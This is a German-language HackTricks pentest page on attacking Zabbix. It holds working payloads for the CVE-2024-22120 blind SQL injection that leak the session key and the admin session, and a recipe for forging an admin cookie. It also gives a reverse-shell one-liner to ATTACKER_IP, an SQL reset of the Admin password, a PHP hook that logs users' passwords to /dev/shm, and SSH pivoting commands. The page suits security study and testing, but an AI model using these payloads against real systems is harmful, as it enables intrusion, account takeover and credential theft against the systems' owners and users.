Zabbix Security

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

Überblick

Zabbix ist eine Monitoring-Plattform, die eine Web UI bereitstellt (typischerweise hinter Apache/Nginx) und eine Server-Komponente, die außerdem das Zabbix protocol über TCP/10051 (server/trapper) sowie einen Agenten auf TCP/10050 verwendet. Während Engagements kann man auf Folgendes stoßen:

  • Web UI: HTTP(S) virtual host wie zabbix.example.tld
  • Zabbix server port: 10051/tcp (JSON over a ZBXD header framing)
  • Zabbix agent port: 10050/tcp

Nützliches Cookie-Format: zbx_session ist Base64 eines kompakten JSON-Objekts, das mindestens sessionid, serverCheckResult, serverCheckTime und sign enthält. Das sign ist ein HMAC des JSON-Payloads.

Neuere Zabbix-Versionen berechnen das Cookie wie folgt:

  • data JSON: {“sessionid”:“<32-hex>”,“serverCheckResult”:true,“serverCheckTime”:<unix_ts>}
  • sign: HMAC-SHA256(key=session_key, data=JSON string of data sorted by keys and compact separators)
  • Final cookie: Base64(JSON_with_sign)

Wenn Sie den globalen session_key und eine gültige Admin sessionid wiederherstellen können, können Sie offline ein gültiges Admin-Cookie fälschen und sich bei der UI authentifizieren.

CVE-2024-22120 — Time-based blind SQLi in Zabbix Server audit log

Affected versions (as publicly documented):

  • 6.0.0–6.0.27, 6.4.0–6.4.12, 7.0.0alpha1

Vulnerability summary:

  • When a Script execution is recorded into the Zabbix Server audit log, the clientip field is not sanitized and is concatenated into SQL, enabling time-based blind SQLi via the server component.
  • This is exploitable by sending a crafted “command” request to the Zabbix server port 10051 with a valid low-privileged sessionid, a hostid the user can access, and a permitted scriptid.

Preconditions and discovery tips:

  • sessionid: From guest/login in the web UI, decode zbx_session (Base64) to get sessionid.
  • hostid: Observe via web UI requests (e.g., Monitoring → Hosts) or intercept with a proxy; common default is 10084.
  • scriptid: Only scripts permitted to the current role will execute; verify by inspecting the script menu/AJAX responses. Defaults like 1 or 2 are often allowed; 3 may be denied.

Exploitation flow

  1. Trigger audit insert with SQLi in clientip
  • Connect to TCP/10051 and send a Zabbix framed message with request=“command” including sid, hostid, scriptid, and clientip set to a SQL expression that will be concatenated by the server and evaluated.

Minimal message (JSON body) fields:

{
"request": "command",
"sid": "<low-priv-sessionid>",
"scriptid": "1",
"clientip": "' + (SQL_PAYLOAD) + '",
"hostid": "10084"
}

Das vollständige Wire-Format ist: “ZBXD\x01” + 8-byte little-endian length + UTF-8 JSON. Du kannst pwntools oder deinen eigenen socket code verwenden, um es zu verpacken.

  1. Time-bruteforce secrets via conditional sleep

Verwende bedingte Ausdrücke, um hex-encoded Geheimnisse zeichenweise (jeweils 1 Zeichen) auszulesen, indem du die Antwortzeit misst. Beispiele, die in der Praxis funktioniert haben:

  • Leak global session_key from config:
(select CASE WHEN (ascii(substr((select session_key from config),{pos},1))={ord}) THEN sleep({T_TRUE}) ELSE sleep({T_FALSE}) END)
  • Leak Admin session_id (userid=1) aus sessions:
(select CASE WHEN (ascii(substr((select sessionid from sessions where userid=1 limit 1),{pos},1))={ord}) THEN sleep({T_TRUE}) ELSE sleep({T_FALSE}) END)

Hinweise:

  • charset: 32 hex chars [0-9a-f]
  • Wähle T_TRUE >> T_FALSE (z. B. 10 vs 1) und messe die Echtzeit pro Versuch
  • Stelle sicher, dass dein scriptid tatsächlich für den Benutzer autorisiert ist; andernfalls wird keine Audit-Zeile erzeugt und das Timing funktioniert nicht
  1. Forge Admin cookie

Sobald du Folgendes hast:

  • session_key: 32-hex from config.session_key
  • admin_sessionid: 32-hex from sessions.sessionid for userid=1

Berechne:

  • sign = HMAC_SHA256(key=session_key, data=json.dumps({sessionid, serverCheckResult:true, serverCheckTime:now}, sort by key, compact))
  • zbx_session = Base64(JSON_with_sign)

Setze das Cookie zbx_session auf diesen Wert und führe ein GET an /zabbix.php?action=dashboard.view aus, um den Admin-Zugriff zu validieren.

Bereits verfügbare Tools

  • Public PoC automatisiert: bruteforce von session_key und admin sessionid sowie cookie forging; benötigt pwntools und requests.
  • Zu übergebende Parameter sind typischerweise: –ip (FQDN of UI), –port 10051, –sid (low-priv), –hostid, und optional ein bekanntes –admin-sid, um Brute-Force zu überspringen.

RCE via Script execution (post-Admin)

Mit Admin-Zugriff in der UI kannst du vordefinierte Scripts gegen überwachte hosts ausführen. Wenn agents/hosts Script-Befehle lokal ausführen, führt das zu Codeausführung auf diesen Systemen (oft als der zabbix user auf Linux-Hosts):

  • Schnellprüfung: run id, um den Benutzerkontext zu bestätigen
  • Reverse shell example:
bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1'

TTY-Upgrade (Linux):

script /dev/null -c bash
# background with Ctrl+Z, then on attacker terminal:
stty raw -echo; fg
reset

Wenn Sie DB access haben, besteht eine Alternative zum forging a cookie darin, das Admin password auf den dokumentierten bcrypt für “zabbix” zurückzusetzen:

UPDATE users SET passwd='$2a$10$ZXIvHAEP2ZM.dLXTm6uPHOMVlARXX7cqjbhM6Fn0cANzkCQBWpMrS' WHERE username='Admin';

Credential capture via login hook (post-exploitation)

Wenn auf dem Web-UI-Server Dateischreibzugriff möglich ist, können Sie vorübergehend ein Logging-Snippet in /usr/share/zabbix/index.php rund um den Abschnitt für formularbasierte Logins hinzufügen, um Zugangsdaten zu erfassen:

// login via form
if (hasRequest('enter') && CWebUser::login(getRequest('name', ZBX_GUEST_USER), getRequest('password', ''))) {
$user = $_POST['name'] ?? '??';
$password = $_POST['password'] ?? '??';
$f = fopen('/dev/shm/creds.txt','a+'); fputs($f, "$user:$password\n"); fclose($f);
CSessionHelper::set('sessionid', CWebUser::$data['sessionid']);
}

Benutzer authentifizieren sich normal; lies anschließend /dev/shm/creds.txt. Entferne den Hook, wenn du fertig bist.

Pivoting zu internen Diensten

Selbst wenn die Service-Account-Shell /usr/sbin/nologin ist, erlaubt das Hinzufügen eines SSH authorized_keys-Eintrags und die Verwendung von -N -L lokales Port-Forwarding zu nur über Loopback erreichbaren Diensten (z. B. CI/CD bei 8111):

ssh -i key user@host -N -L 8111:127.0.0.1:8111

Weitere Tunneling-Muster: Siehe Tunneling and Port Forwarding.

Operative Tipps

  • Validiere, dass scriptid für die aktuelle Rolle erlaubt ist (guest hat möglicherweise nur eine eingeschränkte Auswahl)
  • Timing brute kann langsam sein; zwischenspeichere die wiedergewonnene admin sessionid und verwende sie erneut
  • Das an 10051 gesendete JSON muss mit dem ZBXD\x01-Header und einer little-endian-Länge eingerahmt sein

Referenzen

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks